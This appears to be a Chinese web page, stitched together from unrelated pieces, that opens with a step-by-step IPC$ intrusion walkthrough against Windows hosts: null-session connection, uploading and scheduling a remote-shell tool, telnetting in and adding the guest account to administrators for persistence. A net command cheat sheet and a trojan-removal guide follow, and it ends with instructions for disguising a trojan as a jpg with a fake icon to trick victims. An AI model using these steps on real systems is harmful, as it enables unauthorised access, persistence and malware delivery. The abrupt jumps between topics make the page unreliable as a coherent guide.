一 相關(guān)命令
創(chuàng)新互聯(lián)堅(jiān)持“要么做到,要么別承諾”的工作理念,服務(wù)領(lǐng)域包括:成都網(wǎng)站制作、成都做網(wǎng)站、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣等服務(wù),滿足客戶于互聯(lián)網(wǎng)時代的陽春網(wǎng)站設(shè)計(jì)、移動媒體設(shè)計(jì)的需求,幫助企業(yè)找到有效的互聯(lián)網(wǎng)解決方案。努力成為您成熟可靠的網(wǎng)絡(luò)建設(shè)合作伙伴!
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認(rèn)共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經(jīng)和目標(biāo)建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認(rèn)
提示:對于不熟悉命令行操作的朋友來說.建立ipc$連接后,可以在"我的電腦"或"網(wǎng)上鄰居"右鍵映射網(wǎng)絡(luò)驅(qū)動器,效果一樣.
二 經(jīng)典入侵模式
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運(yùn)氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因?yàn)槊艽a為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復(fù)制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查時間,發(fā)現(xiàn)127.0.0.1 的當(dāng)前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設(shè)置的時間要比主機(jī)時間快,不然你怎么啟動啊,呵呵?。?/p>
5. C:\net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當(dāng)前時間是 2002/3/19 上午 11:05,那就準(zhǔn)備開始下面的命令。
6. C:\telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意端口是99。Telnet默認(rèn)的是23端口,但是我們使用的是SRV在對方計(jì)算機(jī)中為我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務(wù)!這就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機(jī)上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32ntlm
輸入ntlm啟動(這里的C:\WINNT\system32指的是對方計(jì)算機(jī),運(yùn)行ntlm其實(shí)是讓這個程序在對方計(jì)算機(jī)上運(yùn)行)。當(dāng)出現(xiàn)"DONE"的時候,就說明已經(jīng)啟動正常。然后使用"net start telnet"來開啟Telnet服務(wù)!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進(jìn)入對方了,操作就像在DOS上操作一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\net user guest /active:yes
將對方的Guest用戶激活
11. C:\net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼
12. C:\net localgroup administrators guest /add
將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計(jì)算機(jī)).
ipc$經(jīng)典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網(wǎng)絡(luò)命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計(jì)算機(jī)IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設(shè)置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù)
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標(biāo)IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠(yuǎn)程計(jì)算機(jī)上的時間
copy 路徑:\文件名 \\ip\共享名復(fù)制文件到已經(jīng)ipc$連接的計(jì)算機(jī)上
net view ip 查看計(jì)算機(jī)上的共享資源
at 查看自己計(jì)算機(jī)上的計(jì)劃作業(yè)
at \\ip 查看遠(yuǎn)程計(jì)算機(jī)上的計(jì)劃作業(yè)
at \\ip 時間 命令(注意加盤符) 在遠(yuǎn)程計(jì)算機(jī)上加一個作業(yè)
at \\ip 計(jì)劃作業(yè)ID /delete 刪除遠(yuǎn)程計(jì)算機(jī)上的一個計(jì)劃作業(yè)
at \\ip all /delete 刪除遠(yuǎn)程計(jì)算機(jī)上的全部計(jì)劃作業(yè)
at \\ip time "echo 5 c:\t.txt" 在遠(yuǎn)程計(jì)算機(jī)上建立文本文件t.txt;
下面純手打,上面是度娘給的
taskkill /im 進(jìn)程名 停止運(yùn)行
tasklisy 查看運(yùn)行進(jìn)程
ipconfig 查看本機(jī)IP
md 創(chuàng)建文件夾
rd 刪除文件夾
echo off .txt|exit 添加文本
echo 內(nèi)容 .txt 給文本添加內(nèi)容
copy 復(fù)制文件
net user 用戶名 密碼/add 創(chuàng)建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組
由于很多新手對安全問題了解不多,所以并不知道自己的計(jì)算機(jī)中了“木馬”該怎么樣清除。雖然現(xiàn)在市面上有很多新版殺毒軟件都可以自動清除“木馬”,但它們并不能防范新出現(xiàn)的“木馬”程序,因此最關(guān)鍵的還是要知道“木馬”的工作原理,這樣就會很容易發(fā)現(xiàn)“木馬”。相信你看了這篇文章之后,就會成為一名查殺“木馬”的高手了。
“木馬”程序會想盡一切辦法隱藏自己,主要途徑有:在任務(wù)欄中隱藏自己,這是最基本的只要把Form的Visible屬性設(shè)為False、ShowInTaskBar設(shè)為False,程序運(yùn)行時就不會出現(xiàn)在任務(wù)欄中了。在任務(wù)管理器中隱形:將程序設(shè)為“系統(tǒng)服務(wù)”可以很輕松地偽裝自己。
當(dāng)然它也會悄無聲息地啟動,你當(dāng)然不會指望用戶每次啟動后點(diǎn)擊“木馬”圖標(biāo)來運(yùn)行服務(wù)端,,“木馬”會在每次用戶啟動時自動裝載服務(wù)端,Windows系統(tǒng)啟動時自動加載應(yīng)用程序的方法,“木馬”都會用上,如:啟動組、win.ini、system.ini、注冊表等等都是“木馬”藏身的好地方。下面具體談?wù)劇澳抉R”是怎樣自動加載的。
在win.ini文件中,在[WINDOWS]下面,“run=”和“l(fā)oad=”是可能加載“木馬”程序的途徑,必須仔細(xì)留心它們。一般情況下,它們的等號后面什么都沒有,如果發(fā)現(xiàn)后面跟有路徑與文件名不是你熟悉的啟動文件,你的計(jì)算機(jī)就可能中上“木馬”了。當(dāng)然你也得看清楚,因?yàn)楹枚唷澳抉R”,如“AOL Trojan木馬”,它把自身偽裝成command.exe文件,如果不注意可能不會發(fā)現(xiàn)它不是真正的系統(tǒng)啟動文件。
在system.ini文件中,在[BOOT]下面有個“shell=文件名”。正確的文件名應(yīng)該是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟著的那個程序就是“木馬”程序,就是說你已經(jīng)中“木馬”了。
在注冊表中的情況最復(fù)雜,通過regedit命令打開注冊表編輯器,在點(diǎn)擊至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目錄下,查看鍵值中有沒有自己不熟悉的自動啟動文件,擴(kuò)展名為EXE,這里切記:有的“木馬”程序生成的文件很像系統(tǒng)自身文件,想通過偽裝蒙混過關(guān),如“Acid Battery v1.0木馬”,它將注冊表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer 鍵值改為Explorer=“C:\WINDOWS\expiorer.exe”,“木馬”程序與真正的Explorer之間只有“i”與“l(fā)”的差別。當(dāng)然在注冊表中還有很多地方都可以隱藏“木馬”程序,如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目錄下都有可能,最好的辦法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木馬”程序的文件名,再在整個注冊表中搜索即可。
知道了“木馬”的工作原理,查殺“木馬”就變得很容易,如果發(fā)現(xiàn)有“木馬”存在,最安全也是最有效的方法就是馬上將計(jì)算機(jī)與網(wǎng)絡(luò)斷開,防止黑客通過網(wǎng)絡(luò)對你進(jìn)行攻擊。然后編輯win.ini文件,將[WINDOWS]下面,“run=“木馬”程序”或“l(fā)oad=“木馬”程序”更改為“run=”和“l(fā)oad=”;編輯system.ini文件,將[BOOT]下面的“shell=‘木馬’文件”,更改為:“shell=explorer.exe”;在注冊表中,用regedit對注冊表進(jìn)行編輯,先在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木馬”程序的文件名,再在整個注冊表中搜索并替換掉“木馬”程序,有時候還需注意的是:有的“木馬”程序并不是直接將“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下的“木馬”鍵值刪除就行了,因?yàn)橛械摹澳抉R”如:BladeRunner“木馬”,如果你刪除它,“木馬”會立即自動加上,你需要的是記下“木馬”的名字與目錄,然后退回到MS-DOS下,找到此“木馬”文件并刪除掉。重新啟動計(jì)算機(jī),然后再到注冊表中將所有“木馬”文件的鍵值刪除。至此,我們就大功告成了。
小知識:
“木馬”全稱是“特洛伊木馬(Trojan Horse)”,原指古希臘士兵藏在木馬內(nèi)進(jìn)入敵方城市從而占領(lǐng)敵方城市的故事。在Internet上,“特洛伊木馬”指一些程序設(shè)計(jì)人員在其可從網(wǎng)絡(luò)上下載(Download)的應(yīng)用程序或游戲中,包含了可以控制用戶的計(jì)算機(jī)系統(tǒng)的程序,可能造成用戶的系統(tǒng)被破壞甚至癱瘓
解決辦法:現(xiàn)在下載個360安全衛(wèi)士,為什么推薦它呢?由于它跟卡吧斯基聯(lián)手,下一個安全衛(wèi)士能免費(fèi)試用三個月卡吧斯基,這樣你的問題就能解決。
下載安全衛(wèi)士后它再把卡吧斯基裝上,這在安全衛(wèi)士殺馬程序就能操作的,無須到網(wǎng)站上下,方便簡潔。下完后它會提示你把現(xiàn)有的殺毒軟件謝載掉,把它謝完重啟后再裝卡吧斯基,最后裝完升級,重啟進(jìn)入安全模式。這樣差不多能百分百把木馬干掉,我還沒試過這方法不爽的。你試試吧
lenovo電腦如何偽裝成黑客如下
首先,黑客最常使用騙別人執(zhí)行木馬程序的方法,就是將特木馬程序說成為圖像文件,比如說是照片等,應(yīng)該說這是一個最不合邏輯的方法,但卻是最多人中招的方法,有效而又實(shí)用。只要入侵者扮成美眉及更改服務(wù)器程序的文件名(例如sam.exe)為“類似”圖像文件的名稱,再假裝傳送照片給受害者,受害者就會立刻執(zhí)行它。為什么說這是一個不合邏輯的方法呢?圖像文件的擴(kuò)展名根本就不可能是exe,而木馬程序的擴(kuò)展名基本上有必定是exe,明眼人一看就會知道有問題,多數(shù)人在接收時一看見是exe文件,便不會接受了,那有什么方法呢?其實(shí)方法很簡單,他只要把文件名改變,例如把“sam.exe”更改為“sam.jpg”,那么在傳送時,對方只會看見sam.jpg了,而到達(dá)對方電腦時,因?yàn)閣indows默認(rèn)值是不顯示擴(kuò)展名的,所以很多人都不會注意到擴(kuò)展名這個問題,而恰好你的計(jì)算機(jī)又是設(shè)定為隱藏?cái)U(kuò)展名的話,那么你看到的只是sam.jpg了,受騙也就在所難免了!
還有一個問題就是,木馬程序本身是沒有圖標(biāo)的,而在電腦中它會顯示一個windows預(yù)設(shè)的圖標(biāo),別人一看便會知道了!但入侵者還是有辦法的,這就是給文件換個“馬甲”,即修改文件圖標(biāo)。(1)比如下載一個名為IconForge的軟件,再進(jìn)行安裝。
(2)執(zhí)行程序,按下FileOpen
(3)在FileType選擇exe類
(4)在FileOpen中載入預(yù)先制作好的圖標(biāo)(可以用繪圖軟件或?qū)iT制作icon的軟件制作,也可以在網(wǎng)上找找)。
(5)然后按下FileSave便可以了。
如此這般最后得出的,便是看似jpg或其他圖片格式的木馬程序了,很多人就會不經(jīng)意間執(zhí)行了它。